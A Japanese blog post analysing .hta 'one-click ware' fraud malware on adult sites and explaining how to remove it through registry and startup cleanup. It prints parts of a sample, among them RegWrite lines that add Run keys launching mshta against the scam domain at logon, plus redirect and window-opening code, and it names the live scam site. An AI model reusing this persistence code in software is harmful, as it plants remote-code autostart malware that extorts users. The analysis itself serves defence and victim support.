このところ、ワンクリウェアも狡賢くなっています。 アンチウィルスが対応しないような手法を採ろうとしています。 過去のものは少し置いておくとして、ここでは .hta タイプのワンクリウェアについて解説します。 |
---|
ワンクリウェアも5年以上経つと変わるものですね。 .hta タイプ。 エロ動画を見るボタンだと思ってクリックしたら落ちてくるファイルが hogehoge.hta というファイル名だからこう呼びます。 昔は hogehoge.exe という名前で落ちてきたものです。今でも .exe のサイトもありますけど、珍しくなりました。 |
.hta タイプが性悪なのは、セキュリティアプリの対応が期待できないためです。 対応しているアンチウィルスもありますけど、システムに悪影響を与えない、単に特定のWebページを開くだけの仕掛けのため、ウィルスとはとても呼べない代物だからです。 その代わり、駆除も非常に簡単です。 いろいろな手段を使えます。 ◆十分なスキルがあれば、レジストリやスタートアップを直接いじる。 ◆アプリケーションを使うスキルがあれば、以下を使う。 ☆CCleaner ☆窓の手も使えるとか。(未検証) ☆レジストリギアでもいいかも。(未検証) ☆落ちてきたワンクリウェアをVirusTotalに。検出したアンチウィルスで駆除。 ☆早い話、MSConfig(システム内蔵)でもかまいません。(非推奨) ◆ワンクリウェア駆除ツールを使わせてもらう。 これについては解説しません。私は、さじさんには何の連絡も取っていないからです。 さじさんに断り無く、さじさんの荷物を増やすことはできません。 |
要は、レジストリ、またはスタートアップに書き込まれた、『ワンクリウェアサイトの金払え画面』 が自動で開く設定を消せば良いんです。 .hta タイプのワンクリウェア駆除は、これに尽きます。 多くの 『引っかかった人』 は、ファイルのダウンロードダイヤログボックスで、システムの警告を無視して 『開く』 を選択したことでしょう。 その場合、厳密にはワンクリウェア自体はPCの中に入り込んでいるわけですけど、その .hta ファイルを特別削除する必要はありません。 時間がそのワンクリウェアを消してくれます。 DLダイヤログで 『保存する』 を選択した人は、そのファイルを削除してください。まぁ戒めのために置いておくのもいいとは思いますけど。 .hta タイプは、1回走れば用事が終わりますから、普通に削除できるでしょう。 いずれも、ファイルの削除ではなく、レジストリまたはスタートアップの抹消が主眼になります。 一部、わざわざフォルダを作る .hta タイプもありますけど、この場合は作成されたフォルダごと削除したいですね。 |
.hta タイプのワンクリウェアには、2つのタイプがあります。 ◆完全にテキストベースのもの (ソース例1) ◆エンコードされたもの (ソース例2) エンコードされたものは、アンチウィルスの対応が比較的良いようです。 エンコードされたものにまた2つ。 ◆レジストリまたはスタートアップだけを作るもの ◆フォルダまで作るもの 今後、新種が出てくるかも知れませんね。 今のところは、いずれにしても自動起動を止めれば =レジストリまたはスタートアップの抹消= 解決です。 完全駆除しないとハラが立ちますから、余計なファイルも全削除したいところです。 |
注意! PC初心者を自称する方は、この先を読んではいけません。 以下の記述に起因する、いかなる不利益に対しても Sala は責任を取りません。 赤文字で書かなくても、これはインターネットの基本なんですけどね。一応。 さて、このページでは、CCleanerを使ってみることにします。 アプリの入手先は、ご自分で探してください。 と言っても、ググればすぐに見つかります。 その前に、やっておかなければいけないことがありますから、下記を実行してください。 ワンクリウェアに感染していない人も、ここをご覧になったら、必ず実行してください。 Windows を使う以上、必須の設定です。 【参照ページ】 XPまでしか書かれていませんけど、このページをよく読んで、お使いの Windows の設定をこのようにしてください。 Windows を使う以上、ファイルの拡張子に常に注意する必要があります。 また、ウィルスのようなものは、自分自身を隠したがるものです。 隠しファイルは Windows が隠したいだけです。ユーザーは見なければいけません。 でも、見えるようにしたからと言って、消したりいじったりしてはいけません。見えないファイル = 重要なシステムファイルであることが前提ですから。 ウィルスのようなものが隠れている場合でもユーザーに見えるように、という設定です。 この設定をしたら、CCleaner をインストールしましょう。 |
CCleanerのインストールそのものについては解説しません。 ご自分でやってください。 |
私は、使いやすさからWindows2000を使っています。 サポート期限まであと数日ですね。 寂しい限りです。 まぁ概ね似たような画面になろうかと思われますから、気にしないで検証してみることにしましょう。 サンプルは、最近いぬさんの掲示板にURLが出てきた 『フェラガーデン』 にしましょうか。 h ttp://ferachio-tonikakusuki.net/ です。 不用意にアクセスして感染しても知りません。 ご自分で駆除してください。 |
TOP画面です。 なんと、12万円で見放題だそうです。 そのうち有料利用申し込み画面が出てくるんでしょうか? ワンクリですからね。出てこないでしょう。 なお、ワンクリウェアサイトでは、クッキーを許可しないと先に進みません。 ただクッキー拒否設定にしているだけでもワンクリウェア感染を防止することができると言っていいですから、クッキーの取り扱いについて調べることも役に立ちます。 |
2枚目のページです。 『高画質〜〜今すぐダウンロード!!』 という記述で、これは申し込み画面ではありません。 |
3枚目のページです。 いろいろツッコみどころがありますけど、まぁ今回は捨て置きましょう。 これも有料利用申し込み画面ではありません。 『2.動画を見るためには〜〜利用規約を同意した上で進みます。』 なんて書かれていますけど、規約にリンクしているわけでも無し、日本語でも無し(笑 誰でもわかりやすい申し込み画面と、誰が認めるでしょうか。 |
4枚目のページです。 風適法にも沿わないし、特商法にも沿わないですから、風俗営業もできませんし、有料と言うこともできませんね。 いつ有料利用申し込み画面が出てくるんでしょうか? |
5枚目のページです。 ここの上部の説明を真に受けると、ワンクリウェアを直接実行してしまいます。 一般に、ファイルは保存してください。その後、PCにインストールしていない、別のアンチウィルスで検疫すると安全性が高くなります。 特に怪しい場合はVirusTotalにファイルをアップすると複数のアンチウィルスエンジンで検疫してくれます。(駆除してくれるわけではありません。検疫のみ。) ここで検出したアプリを使えば、そのマルウェアを駆除できるでしょう。 |
ワンクリウェアDLダイヤログです。 ここで実行してしまえばワンクリウェアのファイルを捕まえにくいですから、私は 『保存』 しています。 まぁ当然ですけど。 皆さんも、基本、DLするファイルは保存してください。即実行は、事実として信頼できるサイトからのDLに限ってください。 |
さてさて、このワンクリウェアですけど、残念ながら本体ではありませんでした。 <META http-equiv="refresh" content="0; URL=http://fe rachio-tonikakusuki.net/????????p?id=02_01.wmv&cid=6e a52fb1855028587ef2e8f479279d41&f=1"> 少しばかり設定をした上で、このURLを、瞬時に (=http-equiv="refresh" content="0) 読み込みます。 つまり、この飛び先が本体ということらしいですね。 それでは取って来ましょうか。 ちょっと工夫が必要です。 真似しないでくださいね。 下手をすれば感染します。 ですから、URLも伏せ字です。 |
この本体も5ミリ秒でリフレッシュします。 <META http-equiv="refresh" content="5; URL=http://fe rachio-tonikakusuki.net/???????p?cid=6ea52fb185502858 7ef2e8f479279d41"> 純テキストベースのワンクリウェアでした。 生成するレジストリキーも読み取れますね。 .RegWrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVer sion\Run\ferachio-tonikakusuki.net", "mshta http://fe rachio-tonikakusuki.net/???????p?cid=6ea52fb185502858 7ef2e8f479279d41", .RegWrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVer sion\Run\system_boot_6ea52fb1855028587ef2e8f479279d41 ", WindowsDirectory & "\system32\mshta http://ferach io-tonikakusuki.net/???????p?cid=6ea52fb1855028587ef2 e8f479279d41", このようにレジストリに値をセットしています。 で、引き続き、MediaPlayerを起動しています。 Run "wmplayer.exe http://ferachio-tonikakusuki.net/r esist/playmovie.php?id=02_01.wmv&cid=6ea52fb18550285 87ef2e8f479279d41&f=1" このURLにはジャンプしても問題ありません。 もしか、ここを見たワンクリウェアサイトの中の人が改変するかも知れませんから、あまり飛ばない方が良いかもですね。 他に、いくつか窓を開きます。 Window.Open "http://ferachio-tonikakusuki.net/annai0. php","","" Window.Open "http://ferachio-tonikakusuki.net/resist/ main.php","","" Window.Open "http://ferachio-tonikakusuki.net/resist/ playmovie.php?id=02_01.wmv&cid=6ea52fb1855028587ef2e8 f479279d41&f=1","","toolbar=no,location=no,directorie s=no,status=no,menubar=no,scrollbars=no,resizable=yes ,width=500,height=400,top=50,left=20" 最後のURLは凶悪です。 ツールバー非表示、ページのURL非表示、メニューバー非表示、他、可能な限り制限していますね。 リサイズだけ許可ですか。 まぁ、いらない窓は、ALT+F4(アプリケーション一発終了)で閉じましょう。 押しすぎ注意、Windows自体も終了します(笑 |
長くなりましたから、感染は次のページにしましょう。 それでは、コーヒーブレイク。 |